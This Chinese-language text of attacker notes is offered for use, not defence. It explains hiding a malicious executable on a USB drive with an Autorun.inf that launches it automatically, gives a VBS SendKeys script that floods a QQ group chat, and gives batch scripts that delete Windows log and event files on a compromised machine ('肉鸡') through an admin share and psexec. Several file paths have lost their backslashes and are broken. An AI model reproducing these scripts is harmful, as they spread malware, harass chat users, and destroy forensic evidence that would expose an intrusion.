1、将可执行恶意文件放入U盘。并设置隐藏。
2、创建文件 Autorun.inf
3、写入内容:
[AutoRun]
OPEN=恶意文件全名
shellexecute=恶意文件全名
shell\Atuo\command=恶意文件全名
隐藏本文件。
4、当U盘插入新的设备,操作人员双击U盘图标查看U盘时,会自动运行恶意文件。
VBS脚本,QQ群聊刷屏:
新建vbs后缀文件。内容如下:
Set WshShell= WScript.CreateObject("WScript.Shell")
WshShell.AppActivate "群聊刷屏测试"
for i=1 to 10
WScript.Sleep 500
WshShell.SendKeys "^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next
#for i=1to 10”语句用来控制发送次数,表示发送10次
打开一个群聊天窗口并复制要发送的内容到剪贴板上,双击刚才生成的“qq.vbs”切换到群聊天窗口中,在其中可看到已自动刷屏了。
日志清除:
新建del.bat脚本
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
新建clean.bat
@copy del.bat
\%1c$
@echo
向肉鸡复制本机的del.bat
……OK
@psexec
\%1 c:del.bat
@echo
在肉鸡上运行del.bat
,清除日志文件……OK